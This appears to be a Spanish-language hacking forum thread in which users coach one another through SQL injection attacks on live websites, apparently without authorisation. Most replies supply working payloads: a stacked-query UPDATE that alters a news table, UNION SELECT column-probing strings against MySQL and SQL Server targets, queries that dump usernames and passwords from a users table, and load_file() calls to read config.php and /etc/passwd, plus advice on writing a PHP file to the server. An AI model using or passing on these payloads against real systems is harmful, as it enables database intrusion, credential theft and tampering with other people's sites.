Mensajes

Hola,

es necesario cerrar esa comilla??

Si la variable id es un string, es necesario. Pero si es entero tal vez puedes intentar

noticia.php?id=1;UPDATE+Basededatos.noticias+SET+breve+=+0x4572726f72+WHERE+id+=+8/*

saludos

hola,

el mejor vector es intentar crear un archivo php desde una consulta sql, tal como te aconseja Azielito. Para esto debes saber si el usuario root tiene el permiso FILE.

Otra cosa interesante es utilizar load_file(), para poder ver archivos de configuración como config.php y porque no /etc/passwd para enumerar usuarios.

saludos,

buenisimo!!! en realidad felicitaciones.

Lo malo es que no tiene mucho de utilidad debido a que el password sera enviado al mail registrado del usuario, nunca lo podras ver.  o me equivoco,?

saludos!

es posible que el usuario de myql que está ejecutra los scripts web no tenga los privilegios FILE para poder leer archivos. Intenta con union select user() para saber el usuario.

cuenta como vas,

saludos

hola,

no creo que puedas lograr eso. Lo primero seria sacar datos de la base de datos con UNION SELECT y ver analizando si hay una tabla de passwords. Ademas reconoce que sistema e intenta volcar los contenidos de ficheros importantes, tal vez config.php o /etc/passwd con la función load_file()

saludos,

[-1]

hola, como dijo berz3k  seguro estas usando una columna que no se muestra,
para saber que columnas son mostradas deberias probar

site.com/hack.php?key=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Asi, si en la pagina sale el numero 4 digamos, usa esa columna para poner database()
avisa si funciono,

saludos!

'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint.

prueba poniendo lo que quieres sacar en otras posiciones de la consulta

'union select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
'union select 1,1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
.....
......

hola,

es el sistema academico moodle (http://es.wikipedia.org/wiki/Moodle).

deberias buscar vulnerabilidades ya conocidas para esa version.

saludos

hola,

si no te muestra el contenido es porque estas poniendolo en una posicion que no es la correcta, es decir:

union all select 1,concat(usuario),3,4,5 from usuarios/*

sabemos que se tiene 5 columnas. Entonces deducimos que algunas son mostradas y otras no. debes probar lo siguiente

union all select concat(usuario),2,3,4,5 from usuarios/*
union all select 1,concat(usuario),3,4,5 from usuarios/*
union all select 1,2,concat(usuario),4,5 from usuarios/*
...
....

hasta que en algun lado lo muestre. No sólo mires la pagina web, mira el codigo fuente en busca de algo distinto. Puedes probar tambien llamando a algun otro dato como @@version, o user()

saludos

hola,

tambien podrias probar llamando a la funcionar char() en vez de poner el caracter ')' directamente.
busca su numero asci

poniendo -- ya no me da ningun error.
obranueva UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --

si dices que eso ya funciona, entonces prueba hasta que encuentres cual es el campo mostrado en el html, asi:

obranueva UNION SELECT database(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --
obranueva UNION SELECT 1,database(),1,1,1,1,1,1,1,1,1,1 FROM usuarios --
obranueva UNION SELECT 1,1,database(),1,1,1,1,1,1,1,1,1 FROM usuarios --
.
...

hasta que muestre la base de datos que estas utilizando. Luego, sabras en que posicion debes poner username o password, para que te lo muestre.

Algo más, intenta hacer la inyeccion

-1 UNION SELECT database(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --

o algo asi, para que no haga un merge de los 2 selects, y sólo muestre el tuyo,
saludos